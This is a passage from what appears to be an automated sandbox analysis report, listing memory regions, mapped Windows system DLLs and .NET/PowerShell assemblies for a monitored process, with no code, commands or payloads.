0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 403 start_va = 0x73bc0000 end_va = 0x73bc9fff monitored = 0 entry_point = 0x73bc4d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 404 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 405 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 406 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 407 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 408 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 409 start_va = 0x5c0000 end_va = 0x5fbfff monitored = 0 entry_point = 0x5c128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 410 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 411 start_va = 0x6c430000 end_va = 0x6c4bcfff monitored = 1 entry_point = 0x6c442860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 412 start_va = 0x71990000 end_va = 0x71992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 413 start_va = 0x74d50000 end_va = 0x74d58fff monitored = 0 entry_point = 0x74d51220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 414 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 415 start_va = 0x68ce0000 end_va = 0x6948efff monitored = 1 entry_point = 0x68cfd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 416 start_va = 0x69490000 end_va = 0x69c3efff monitored = 1 entry_point = 0x694ad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 417 start_va = 0x70790000 end_va = 0x707a3fff monitored = 0 entry_point = 0x7079ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\System32\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll") Region: id = 418 start_va = 0x6c2f0000 end_va = 0x6c39afff monitored = 0 entry_point = 0x6c385f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\System32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll") Region: id = 419 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 420 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 421 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 422 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 423 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 424 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 425 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 426 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 427 start_va = 0xc10000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 428 start_va = 0xc20000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 429 start_va = 0x19f0000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 430 start_va = 0xd20000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 431 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 432 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 433 start_va = 0xc30000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 434 start_va = 0x1ae0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 435 start_va = 0xc70000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 436 start_va = 0x1a20000 end_va = 0x1a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 437 start_va = 0x1aa0000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 438 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 439 start_va = 0x68080000 end_va = 0x6948afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 440 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 441 start_va = 0x3ae0000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 442 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 443 start_va = 0x67620000 end_va = 0x68074fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 444 start_va = 0x66e00000 end_va = 0x67617fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 445 start_va = 0x6c260000 end_va = 0x6c2eefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\d254c63bedcb76c81c3125bd527b7d1a\\microsoft.powershell.consolehost.ni.dll") Region: id = 446 start_va = 0x65310000 end_va = 0x66df2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\73a1a80aed03e789a49cec899b7505dd\\system.management.automation.ni.dll") Region: id = 447 start_va = 0x3ae0000 end_va = 0x3b41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 448 start_va = 0x3be0000 end_va = 0x3c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 449 start_va = 0x3d10000 end_va = 0x3d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 450 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 451 start_va = 0x3ba0000 end_va = 0x3bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 452 start_va = 0x70770000 end_va = 0x70782fff monitored = 1 entry_point = 0x7077d900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 453 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 454 start_va = 0x64c00000 end_va = 0x6530bfff monitored = 1 entry_point = 0x6521f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 455 start_va = 0x644f0000 end_va = 0x64bfbfff monitored = 1 entry_point = 0x64b0f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 456 start_va = 0x3d50000 end_va = 0x4021fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 457 start_va = 0x3c20000 end_va = 0x3cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 458 start_va = 0x64c00000 end_va = 0x6530bfff monitored = 1 entry_point = 0x6521f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 459 start_va = 0x644f0000 end_va = 0x64bfbfff monitored = 1 entry_point = 0x64b0f38e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 460 start_va = 0x4030000 end_va = 0x40effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 461 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 462 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 463 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 464 start_va = 0x76120000 end_va = 0x76124fff monitored = 0 entry_point = 0x76121438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 465 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 466 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 467 start_va = 0xce0000 end_va = 0xce7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 468 start_va = 0x707e0000 end_va = 0x707e7fff monitored = 0 entry_point = 0x707e3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 469 start_va = 0x41e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 470 start_va = 0xcf0000 end_va = 0xcf7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 471 start_va = 0x41e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041e0000" filename = "" Region: id = 472 start_va = 0x4200000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 473 start_va = 0x702d0000 end_va = 0x702e5fff monitored = 0 entry_point = 0x702d13df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 474 start_va = 0x7ffd5000 end_va = 0x7ffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 475 start_va = 0x6c3a0000 end_va = 0x6c423fff monitored = 0 entry_point = 0x6c3a19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 476 start_va = 0x3c20000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 477 start_va = 0x6fb60000 end_va = 0x6fb69fff monitored = 0 entry_point = 0x6fb64ab0 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 478 start_va = 0x1a60000 end_va = 0x1a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 479 start_va = 0x7ffd4000 end_va = 0x7ffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 480 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 481 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 482 start_va = 0xd00000 end_va = 0xd06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 483 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 484 start_va = 0xd00000 end_va = 0xd06fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 485 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 486 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 487 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 488 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 489 start_va = 0xcf0000 end_va = 0xcf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 490 start_va = 0xcf0000 end_va = 0xcf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 491 start_va = 0x3c50000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 492 start_va = 0x3cd0000 end_va = 0x3cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cd0000" filename = "" Region: id = 493 start_va = 0x7ffd3000 end_va = 0x7ffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 494 start_va = 0x4340000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004340000" filename = "" Region: id = 495 start_va = 0x7ffaf000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 496 start_va = 0x64af0000 end_va = 0x65309fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.data\\df2dd09ed7c341842a104e1e668f184e\\system.data.ni.dll") Region: id = 497 start_va = 0x6bf00000 end_va = 0x6c253fff monitored = 1 entry_point = 0x6c237a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 498 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 499 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 500 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 501 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 502 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 503 start_va = 0x4380000 end_va = 0x46d0fff monitored = 1 entry_point = 0x46b7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 504 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 505 start_va = 0x64370000 end_va = 0x64ae3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 506 start_va = 0x6bdd0000 end_va = 0x6befffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 507 start_va = 0x6a3f0000 end_va = 0x6a51bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\system.directoryservices.ni.dll") Region: id = 508 start_va = 0x707d0000 end_va = 0x707d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-xstate-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll") Region: id = 509 start_va = 0x6a360000 end_va = 0x6a3e8fff monitored = 1 entry_point = 0x6a361130 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 510 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 511 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 512 start_va = 0x6bd70000 end_va = 0x6bdc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.P6f792626#\\05765f777020deeddc8ad54b48343b9c\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.p6f792626#\\05765f777020deeddc8ad54b48343b9c\\microsoft.powershell.security.ni.dll") Region: id = 513 start_va = 0x40f0000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040f0000" filename = "" Region: id = 514 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 515 start_va = 0x6a2a0000 end_va = 0x6a357fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Transactions\\3d760b4a3260a41ef84a3fd866780980\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.transactions\\3d760b4a3260a41ef84a3fd866780980\\system.transactions.ni.dll") Region: id = 516 start_va = 0x6abc0000 end_va = 0x6ac0bfff monitored = 1 entry_point = 0x6abdfcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 517 start_va = 0x4240000 end_va = 0x433ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 518 start_va = 0x3b50000 end_va = 0x3b9bfff monitored = 1 entry_point = 0x3b6fcc6 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.transactions\\v4.0_4.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 